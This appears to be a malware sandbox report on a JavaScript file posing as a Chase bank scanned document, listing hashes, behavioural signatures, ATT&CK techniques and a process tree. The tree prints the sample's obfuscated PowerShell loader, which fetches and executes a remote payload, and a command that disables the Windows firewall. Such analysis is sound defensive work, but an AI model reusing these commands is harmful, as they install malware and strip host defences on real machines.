Overview

overview

10

Static

static

1

New_ScanDo...ice.js

windows10-1703-x64

10

Analysis

  • max time kernel
    184s
  • max time network
    194s
  • platform
    windows10-1703_x64
  • resource
    win10-20231215-en
  • resource tags

    arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
  • submitted
    17-01-2024 01:58

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    New_ScanDoc#092387CHASEeAdvice.js

  • Size

    1.4MB

  • MD5

    286d534eb759c671fa9e79cfafd3bc85

  • SHA1

    d165938c1c607618c5cb6d9d11cf5b371f007ac7

  • SHA256

    77109ba56a5e70fafe88a10800764ec30d35727c1ff8cdb2934534ae8c7e048b

  • SHA512

    3b1ee1a647b623265ad7e90d786e61cafe6ca5e312676dafcc198763cf8efe3f479fb66b4aae9d1e7289ec5433055ab193ffd91abefc732e3d337d4fe987119b

  • SSDEEP

    192:FQzfvQzrHHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHHnHHHHHHf:efYzD

Score
10/10
evasionpersistencetrojan

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Blocklisted process makes network request 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Registers COM server for autorun 1 TTPs 2 IoCs
    persistence
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\New_ScanDoc#092387CHASEeAdvice.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1468
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm simoubizw.blogspot.com///////////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 6
      2⤵
      • UAC bypass
      • Blocklisted process makes network request
      • Registers COM server for autorun
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5020
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\afko1hso\afko1hso.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3164
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB594.tmp" "c:\Users\Admin\AppData\Local\Temp\afko1hso\CSC8B2C5738380449018CCA3CA651F493C4.TMP"
          4⤵
            PID:600
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue
          3⤵
          • Modifies Windows Firewall
          PID:4980
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4544
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:524
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
            dw20.exe -x -s 704
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:3044
        • C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
          "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3600
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
            dw20.exe -x -s 704
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:1832

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Initial Access

    Execution

    Persistence

    Create or Modify System Process

    1
    T1543

    Windows Service

    1
    T1543.003

    Boot or Logon Autostart Execution

    2
    T1547

    Registry Run Keys / Startup Folder

    2
    T1547.001

    Privilege Escalation

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Create or Modify System Process

    1
    T1543

    Windows Service

    1
    T1543.003

    Boot or Logon Autostart Execution

    2
    T1547

    Registry Run Keys / Startup Folder

    2
    T1547.001

    Defense Evasion

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Impair Defenses

    1
    T1562

    Disable or Modify Tools

    1
    T1562.001

    Modify Registry

    2
    T1112

    Credential Access

    Discovery

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Web Service

    1
    T1102

    Impact

    Resource Development

    Reconnaissance

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RESB594.tmp
      Filesize

      1KB

      MD5

      d98885d5740fac1a3aa5ac2ea62cc950

      SHA1

      c1b76024b1bc5a0b55ad5d38d82482997d92712d

      SHA256

      e96c4725ee919132fd1ea9f4073696f0853d5697a2ed0653344de28c4ae9e691

      SHA512

      dd9c17238eb9ea34234ac3467d78ce04f01e6f53ec698641562375da4f0fcc1bacb35f1d662127b79e90064b69d080814e1c0285550bb900cd4addf5fe39c95f

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bxe2euzs.ykg.ps1
      Filesize

      1B

      MD5

      c4ca4238a0b923820dcc509a6f75849b

      SHA1

      356a192b7913b04c54574d18c28d46e6395428ab

      SHA256

      6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

      SHA512

      4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\afko1hso\afko1hso.dll
      Filesize

      3KB

      MD5

      a6411608155ba32adc204ca1e5ba94e2

      SHA1

      8615409b29771a319f92c2fdc172bfd51fdd2905

      SHA256

      8caedc0b1e76ca1673e6c1154dea5c1c8fa7f3c89c7cfc5070addc123a08c5cf

      SHA512

      4fe15374b490011f6406060de116e08c780ec861f99265690b7cb41dcbbd1efcc7613a2f17cc6a066a6d3c96cf07864cc52ac3af210c1f9640cdae5c6b7b3fc6

      Download Submit
    • \??\c:\Users\Admin\AppData\Local\Temp\afko1hso\CSC8B2C5738380449018CCA3CA651F493C4.TMP
      Filesize

      652B

      MD5

      399c721be0552d4d7396eba366dbc668

      SHA1

      49a8132735aa331cf9eacbcc31a8e52556f1ca5f

      SHA256

      d44dd59782c5b4cf15a6e57bd06d0422b7847c341324e264d0bf57d8aca62b44

      SHA512

      5debdf77d93c403d74bc90081f0032a44595f9d3275ebba9529cd8627a7731334d5cb5ca5d95010d23a49f22211c442e9fac3d1ac2ae91dff33b2ff61c7a6f97

      Download Submit
    • \??\c:\Users\Admin\AppData\Local\Temp\afko1hso\afko1hso.0.cs
      Filesize

      870B

      MD5

      e06ebf853695db38aaac82c9af297ae4

      SHA1

      ef98bacec5ac2ae3bf24aac8ed56935a25c1f064

      SHA256

      79c1099bad1dccb1d151887071b8e8b5d679de343903895fa28e45b791cae344

      SHA512

      036449d932066d506a6bd7c08df311bf1ed5e7b3595004941fe1c39a8e9f9b0d08d43b33a180d4851f88d49c98a17b05cf5235858ada611306fc602cfd582759

      Download Submit
    • \??\c:\Users\Admin\AppData\Local\Temp\afko1hso\afko1hso.cmdline
      Filesize

      369B

      MD5

      612780a8361711b3ade3666a35c73817

      SHA1

      f0178b947f8388255bdc2ad28d34ad9a95cf2b66

      SHA256

      14848d5dd8b99e6e834b9de9121fbacb5a5fe66bda20eff87bb4537017552e8b

      SHA512

      618d4d4cead557f8499464356a098618d79ccfff79ab8647f694780a039fcb4f730b8d6e039b2b3e8a68b3a1a8768f27499bee8c27628daced23142233a4e3fe

      Download Submit
    • memory/524-190-0x00000000006F0000-0x0000000000700000-memory.dmp
      Filesize

      64KB

      Download
    • memory/524-188-0x000000006FF10000-0x00000000704C0000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/524-266-0x000000006FF10000-0x00000000704C0000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/524-258-0x000000006FF10000-0x00000000704C0000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/524-189-0x000000006FF10000-0x00000000704C0000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/3600-263-0x000000006FF10000-0x00000000704C0000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/3600-260-0x00000000022C0000-0x00000000022D0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3600-259-0x000000006FF10000-0x00000000704C0000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/3600-208-0x000000006FF10000-0x00000000704C0000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/3600-203-0x00000000022C0000-0x00000000022D0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3600-201-0x000000006FF10000-0x00000000704C0000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/4544-182-0x00000000057E0000-0x000000000587C000-memory.dmp
      Filesize

      624KB

      Download
    • memory/4544-185-0x00000000060B0000-0x0000000006272000-memory.dmp
      Filesize

      1.8MB

      Download
    • memory/4544-257-0x00000000057D0000-0x00000000057E0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/4544-256-0x0000000073690000-0x0000000073D7E000-memory.dmp
      Filesize

      6.9MB

      Download
    • memory/4544-176-0x0000000000400000-0x000000000048C000-memory.dmp
      Filesize

      560KB

      Download
    • memory/4544-178-0x0000000073690000-0x0000000073D7E000-memory.dmp
      Filesize

      6.9MB

      Download
    • memory/4544-177-0x0000000001100000-0x000000000118C000-memory.dmp
      Filesize

      560KB

      Download
    • memory/4544-179-0x0000000005BB0000-0x00000000060AE000-memory.dmp
      Filesize

      5.0MB

      Download
    • memory/4544-180-0x00000000055D0000-0x0000000005636000-memory.dmp
      Filesize

      408KB

      Download
    • memory/4544-181-0x00000000057D0000-0x00000000057E0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/4544-251-0x0000000006E50000-0x0000000006E5A000-memory.dmp
      Filesize

      40KB

      Download
    • memory/4544-183-0x0000000005880000-0x0000000005912000-memory.dmp
      Filesize

      584KB

      Download
    • memory/4544-184-0x0000000005640000-0x0000000005690000-memory.dmp
      Filesize

      320KB

      Download
    • memory/5020-172-0x000001925ED50000-0x000001925ED60000-memory.dmp
      Filesize

      64KB

      Download
    • memory/5020-255-0x00007FF868C00000-0x00007FF8695EC000-memory.dmp
      Filesize

      9.9MB

      Download
    • memory/5020-173-0x000001925ED50000-0x000001925ED60000-memory.dmp
      Filesize

      64KB

      Download
    • memory/5020-4-0x000001925EED0000-0x000001925EEF2000-memory.dmp
      Filesize

      136KB

      Download
    • memory/5020-171-0x000001925ED50000-0x000001925ED60000-memory.dmp
      Filesize

      64KB

      Download
    • memory/5020-170-0x00007FF868C00000-0x00007FF8695EC000-memory.dmp
      Filesize

      9.9MB

      Download
    • memory/5020-55-0x000001925ED40000-0x000001925ED48000-memory.dmp
      Filesize

      32KB

      Download
    • memory/5020-7-0x000001925ED50000-0x000001925ED60000-memory.dmp
      Filesize

      64KB

      Download
    • memory/5020-30-0x000001925F870000-0x000001925FA32000-memory.dmp
      Filesize

      1.8MB

      Download
    • memory/5020-187-0x000001925ED50000-0x000001925ED60000-memory.dmp
      Filesize

      64KB

      Download
    • memory/5020-175-0x000001925EBA0000-0x000001925EBBA000-memory.dmp
      Filesize

      104KB

      Download
    • memory/5020-174-0x000001925EB60000-0x000001925EB6E000-memory.dmp
      Filesize

      56KB

      Download
    • memory/5020-5-0x00007FF868C00000-0x00007FF8695EC000-memory.dmp
      Filesize

      9.9MB

      Download
    • memory/5020-9-0x000001925ED50000-0x000001925ED60000-memory.dmp
      Filesize

      64KB

      Download
    • memory/5020-10-0x000001925F080000-0x000001925F0F6000-memory.dmp
      Filesize

      472KB

      Download
    • memory/5020-23-0x000001925ED50000-0x000001925ED60000-memory.dmp
      Filesize

      64KB

      Download
    • memory/5020-41-0x000001925ED50000-0x000001925ED60000-memory.dmp
      Filesize

      64KB

      Download